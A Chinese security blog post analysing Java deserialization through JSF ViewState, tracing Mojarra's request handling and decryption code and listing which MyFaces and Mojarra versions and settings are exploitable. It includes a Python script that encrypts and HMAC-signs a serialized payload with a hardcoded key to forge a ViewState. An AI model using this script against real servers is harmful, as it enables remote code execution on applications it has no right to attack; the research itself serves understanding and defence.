Java安全之JSF 反序列化 - nice_0e3
2022-4-29 01:59:0 Author: www.cnblogs.com(查看原文) 阅读量:22 收藏

前言

偶遇一些奇葩环境,拿出来炒冷饭

JSF简述

JSF”指的是2004年发布的第一个版本的Java规范。这方面的许多实现

规范存在。其中最常用的是Sun(现在的Oracle)发布的Mojarra和Apache发布的MyFaces

JavaServerFaces(JSF)概念在几年前就已经引入,现在主要在J2EE中使用

应用。它在web应用程序开发中最繁琐的部分之一:用户界面上添加了一个抽象层。

JSF层有助于在应用程序中集成复杂的小部件,例如:

•使用专用标签的图形组件;

•借助表单属性实现自动Ajax层;

•复杂格式的数据导出功能(例如:PDF、Excel等)。

然而,如果认为添加这种特性只会促进开发人员的任务,那就太天真了。事实上,它伴随着

模糊和复杂的机制。ViewState就是这些机制之一。

Mojarra 反序列化调试

web.xml中配置

<servlet>
        <servlet-name>Faces Servlet</servlet-name>
        <servlet-class>javax.faces.webapp.FacesServlet</servlet-class>
        <load-on-startup>1</load-on-startup>
    </servlet>
    <!-- Map these files with JSF -->
	<servlet-mapping>
		<servlet-name>Faces Servlet</servlet-name>
		<url-pattern>/faces/*</url-pattern>
	</servlet-mapping>
	<servlet-mapping>
		<servlet-name>Faces Servlet</servlet-name>
		<url-pattern>*.jsf</url-pattern>
	</servlet-mapping>
    public void service(ServletRequest req, ServletResponse resp) throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest)req;
        HttpServletResponse response = (HttpServletResponse)resp;
        this.requestStart(request.getRequestURI());
        if (!this.isHttpMethodValid(request)) {
            response.sendError(400);
        } else {
            //省略...
            }

            //省略...
           
            try {
                ResourceHandler handler = context.getApplication().getResourceHandler();
                if (handler.isResourceRequest(context)) {
                    handler.handleResourceRequest(context);
                } else {
                    this.lifecycle.execute(context);
                    this.lifecycle.render(context);
                }
            } catch (FacesException var12) {
              
            }

                 //省略...
            } finally {
                context.release();
            }

            this.requestEnd();
        }
    }

调用this.lifecycle.execute(context);

com.sun.faces.lifecycle.LifecycleImpl

 public LifecycleImpl() {
        this.phases = new Phase[]{null, new RestoreViewPhase(), new ApplyRequestValuesPhase(), new ProcessValidationsPhase(), new UpdateModelValuesPhase(), new InvokeApplicationPhase(), this.response};
        this.listeners = new CopyOnWriteArrayList();
    }

    public void execute(FacesContext context) throws FacesException {
        if (context == null) {
            throw new NullPointerException(MessageUtils.getExceptionMessageString("com.sun.faces.NULL_PARAMETERS_ERROR", new Object[]{"context"}));
        } else {
            if (LOGGER.isLoggable(Level.FINE)) {
                LOGGER.fine("execute(" + context + ")");
            }

            int i = 1;

            for(int len = this.phases.length - 1; i < len && !context.getRenderResponse() && !context.getResponseComplete(); ++i) {
                this.phases[i].doPhase(context, this, this.listeners.listIterator());
            }

        }
    }

this.phases[i].doPhase遍历调用doPhase,默认装载调用这几个列new RestoreViewPhase(), new ApplyRequestValuesPhase(), new ProcessValidationsPhase(), new UpdateModelValuesPhase(), new InvokeApplicationPhase(), this.response}; this.listeners = new CopyOnWriteArrayList()

    public void execute(FacesContext facesContext) throws FacesException {
        if (LOGGER.isLoggable(Level.FINE)) {
            LOGGER.fine("Entering RestoreViewPhase");
        }

        //省略无用代码...
        
                    ViewHandler viewHandler = Util.getViewHandler(facesContext);
                    boolean isPostBack = facesContext.isPostback() && !isErrorPage(facesContext);
                    if (isPostBack) {
                        facesContext.setProcessingEvents(false);
                        viewRoot = viewHandler.restoreView(facesContext, viewId);

该方法是获取请求过来的 路径的 这里传递/index.xhtml即获取该位置的ViewState视图。

省略无效代码,流程走到 com.sun.faces.application.view.FaceletViewHandlingStrategy

public UIViewRoot restoreView(FacesContext context, String viewId) {
        Util.notNull("context", context);
        Util.notNull("viewId", viewId);
        if (UIDebug.debugRequest(context)) {
            context.getApplication().createComponent("javax.faces.ViewRoot");
        }

        ViewHandler outerViewHandler = context.getApplication().getViewHandler();
        String renderKitId = outerViewHandler.calculateRenderKitId(context);
        ResponseStateManager rsm = RenderKitUtils.getResponseStateManager(context, renderKitId);
        Object incomingState = rsm.getState(context, viewId);
 public Object getState(FacesContext ctx, String viewId) throws IOException {
        String stateString = getStateParamValue(ctx);
        if (stateString == null) {
            return null;
        } else {
            return "stateless".equals(stateString) ? "stateless" : this.doGetState(stateString);
        }
    }

来到com.sun.faces.renderki.ClientSideStateHelper#doGetState,关键代码,这里是jsf反序列化过程具体的实现

 protected Object doGetState(String stateString) {
        if ("stateless".equals(stateString)) {
            return null;
        } else {
            ObjectInputStream ois = null;
            InputStream bis = new Base64InputStream(stateString);

            Object var5;
            try {
                Object state;
                if (this.guard != null) {
                    byte[] bytes = stateString.getBytes();
                    int numRead = ((InputStream)bis).read(bytes, 0, bytes.length);
                    byte[] decodedBytes = new byte[numRead];
                    ((InputStream)bis).reset();
                    ((InputStream)bis).read(decodedBytes, 0, decodedBytes.length);
                    bytes = this.guard.decrypt(decodedBytes);
                    if (bytes == null) {
                        state = null;
                        return state;
                    }

                    bis = new ByteArrayInputStream(bytes);
                }

                if (this.compressViewState) {
                    bis = new GZIPInputStream((InputStream)bis);
                }

                ois = this.serialProvider.createObjectInputStream((InputStream)bis);
                long stateTime = 0L;
                if (this.stateTimeoutEnabled) {
                    try {
                        stateTime = ois.readLong();
                    } catch (IOException var25) {
                        if (LOGGER.isLoggable(Level.FINE)) {
                            LOGGER.fine("Client state timeout is enabled, but unable to find the time marker in the serialized state.  Assuming state to be old and returning null.");
                        }

                        state = null;
                        return state;
                    }
                }

                Object structure = ois.readObject();
                state = ois.readObject();

代码中inputStream bis = new Base64InputStream(stateString);

 public Base64InputStream(String encodedString) {
        this.buf = this.decode(encodedString);
        this.pos = 0;
        this.count = this.buf.length;
    }

这里会对数据进行进行base64解密。解密完成后然后判断this.guard是否为空,this.guard是标记是否启用加密

if (this.guard != null) {
                    byte[] bytes = stateString.getBytes();
                    int numRead = ((InputStream)bis).read(bytes, 0, bytes.length);
                    byte[] decodedBytes = new byte[numRead];
                    ((InputStream)bis).reset();
                    ((InputStream)bis).read(decodedBytes, 0, decodedBytes.length);
                    bytes = this.guard.decrypt(decodedBytes);
                    if (bytes == null) {
                        state = null;
                        return state;
                    }

解密算法实现

 public byte[] decrypt(byte[] bytes) {
        try {
            byte[] macBytes = new byte[32];
            System.arraycopy(bytes, 0, macBytes, 0, macBytes.length);
            byte[] iv = new byte[16];
            System.arraycopy(bytes, macBytes.length, iv, 0, iv.length);
            byte[] encdata = new byte[bytes.length - macBytes.length - iv.length];
            System.arraycopy(bytes, macBytes.length + iv.length, encdata, 0, encdata.length);
            IvParameterSpec ivspec = new IvParameterSpec(iv);
            Cipher decryptCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
            decryptCipher.init(2, this.sk, ivspec);
            this.decryptMac.update(iv);
            this.decryptMac.update(encdata);
            byte[] macBytesCalculated = this.decryptMac.doFinal();
            if (this.areArrayEqualsConstantTime(macBytes, macBytesCalculated)) {
                byte[] plaindata = decryptCipher.doFinal(encdata);
                return plaindata;
            } else {
                System.err.println("ERROR: MAC did not verify!");
                return null;
            }
        } catch (Exception var9) {
            System.err.println("ERROR: Decrypting:" + var9.getCause());
            return null;
        }
    }

这里没使用加密直接跳过这个步骤,然后使用bis = new GZIPInputStream((InputStream)bis); 进行gzip解压,最后调用ois.readObject();进行反序列化

image-20220429005536038

https://www.ibm.com/docs/en/was/8.5.5?topic=parameters-jsf-engine-configuration

Mojarra 加密编码

默认情况下,“ViewState”数据存储在页面中的隐藏字段中,并使用base64编码进行编码。

"ViewState"也可以编码为"base64和gzip"(Base64Gzip),以"H4sIAAA"开头。

image-20220429012946893

com.sun.faces.renderkit.ByteArrayGuard#setupKeyAndMac

   private void setupKeyAndMac() {
        try {
            InitialContext context = new InitialContext();
            String encodedKeyArray = (String)context.lookup("java:comp/env/jsf/ClientSideSecretKey");
            byte[] keyArray = DatatypeConverter.parseBase64Binary(encodedKeyArray);
            this.sk = new SecretKeySpec(keyArray, "AES");
        } catch (NamingException var5) {
            if (LOGGER.isLoggable(Level.FINEST)) {
                LOGGER.log(Level.FINEST, "Unable to find the encoded key.", var5);
            }
        }

        if (this.sk == null) {
            try {
                KeyGenerator kg = KeyGenerator.getInstance("AES");
                kg.init(128);
                this.sk = kg.generateKey();
            } catch (Exception var4) {
                throw new FacesException(var4);
            }
        }

    }

image-20220429014155002

先取前面32位个字节为mac地址,从32位后再去16位位iv值,剩下的就是加密后的数据了。

 public byte[] decrypt(FacesContext facesContext, byte[] bytes) {
        try {
            byte[] macBytes = new byte[32];
            System.arraycopy(bytes, 0, macBytes, 0, macBytes.length);
            byte[] iv = new byte[16];
            System.arraycopy(bytes, macBytes.length, iv, 0, iv.length);
            byte[] encdata = new byte[bytes.length - macBytes.length - iv.length];
            System.arraycopy(bytes, macBytes.length + iv.length, encdata, 0, encdata.length);
            IvParameterSpec ivspec = new IvParameterSpec(iv);
            SecretKey secKey = this.getSecretKey(facesContext);
            Cipher decryptCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
            decryptCipher.init(2, secKey, ivspec);
            Mac decryptMac = Mac.getInstance("HmacSHA256");
            decryptMac.init(secKey);
            decryptMac.update(iv);
            decryptMac.update(encdata);
            byte[] macBytesCalculated = decryptMac.doFinal();
            if (this.areArrayEqualsConstantTime(macBytes, macBytesCalculated)) {
                byte[] plaindata = decryptCipher.doFinal(encdata);
                return plaindata;
            } else {
                System.err.println("ERROR: MAC did not verify!");
                return null;
            }
        } catch (Exception var12) {
            System.err.println("ERROR: Decrypting:" + var12.getCause());
            return null;
        }
    }

AES取密钥解密后,进行HmacSHA256解密,这个解密的密钥和iv是前面传递序列化字段的0-31个字节和32-47个字节内容

然后进行HmacSHA256解密后,就是gzip后的base64序列化数据了。

加密脚本

#!/usr/bin/python3
import sys
import hmac
from urllib import parse
from base64 import b64encode
from hashlib import sha1
from pyDes import *

YELLOW = "\033[93m"
GREEN = "\033[32m"

def encrypt(payload,key):
	cipher = des(key, ECB, IV=None, pad=None, padmode=PAD_PKCS5)
	enc_payload = cipher.encrypt(payload)
	return enc_payload

def hmac_sig(enc_payload,key):
	hmac_sig = hmac.new(key, enc_payload, sha1)
	hmac_sig = hmac_sig.digest()
	return hmac_sig

key = b'JsF9876-'

if len(sys.argv) != 3 :
	print(YELLOW + "[!] Usage : {} [Payload File] [Output File]".format(sys.argv[0]))
else:
	with open(sys.argv[1], "rb") as f:
		payload = f.read()
		f.close()
	print(YELLOW + "[+] Encrypting payload")
	print(YELLOW + "  [!] Key : JsF9876-\n")
	enc_payload = encrypt(payload,key)
	print(YELLOW + "[+] Creating HMAC signature")
	hmac_sig = hmac_sig(enc_payload,key)
	print(YELLOW + "[+] Appending signature to the encrypted payload\n")
	payload = b64encode(enc_payload + hmac_sig)
	payload = parse.quote_plus(payload)
	print(YELLOW + "[*] Final payload : {}\n".format(payload))
	with open(sys.argv[2], "w") as f:
		f.write(payload)
		f.close()
	print(GREEN + "[*] Saved to : {}".format(sys.argv[2]))

jsf攻击方式

利用条件

所有MyFaces版本1.1.7、1.2.8、2.0和更早版本,以及Mojarra 1.2.14、2.0.2和

JSF2.2之前的规范要求实现加密机制,但不要求使用加密机制。

Mojarra的默认javax.faces.STATE_SAVING_METHOD设置是server. 开发人员需要手动将其更改为,client Mojarra 才能进行利用。如果将序列化的 ViewState 发送到服务器,但 Mojarra 使用server则ViewState 保存它,不会尝试反序列化它。

MyFaces的默认javax.faces.STATE_SAVING_METHOD设置是server。但是MyFaces无论值是client或者是server,都能进行反序列化

安全层可以通过特定的配置参数启用。对于Mojarra,文件中的以下行

web.xml)启用ViewState数据加密。请注意,Mojarra不执行完整性检查(HMAC):

<enventry> 
<enventryname>com.sun.faces.ClientStateSavingPassword</enventryname> 
<enventrytype>java.lang.String</enventrytype> 
<enventryvalue>[YOUR_SECRET_KEY]</enventryvalue>
</enventry>

对于MyFaces,以下几行启用ViewState加密和完整性检查

<contextparam>
<paramname>org.apache.myfaces.USE_ENCRYPTION</paramname>
<paramvalue>true</paramvalue>
</contextparam>

可以指定加密密钥以及算法。否则它们将由MyFaces自动生成。

还应该注意的是,2013年发布的JSF 2.2规范默认要求激活ViewState加密。

在那之前,Mojarra实现不像MyFaces那样默认启用它。

Mojarra 1.2.x-2.0.3 中,密码[will]用作 SecureRandom seed来生成DES algorithm key。

Mojarra 2.0.4-2.1.x 中,他们changed从DES到AES的算法,并且代码现在不再actually不再使用提供的密码来生成 key (以防止潜在的麻烦)。相反,完全随机的 key 是generated,它更安全。现在,JNDI条目基本上控制客户机状态是否应该加密。换句话说,它现在的行为就像一个 bool 配置条目。因此,使用哪个密码绝对不再重要。

参考

https://javaee.github.io/javaserverfaces-spec/

https://www.synopsys.com/content/dam/synopsys/sig-assets/whitepapers/exploiting-the-java-deserialization-vulnerability.pdf

https://book.hacktricks.xyz/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization

结尾

多喝热水!!!


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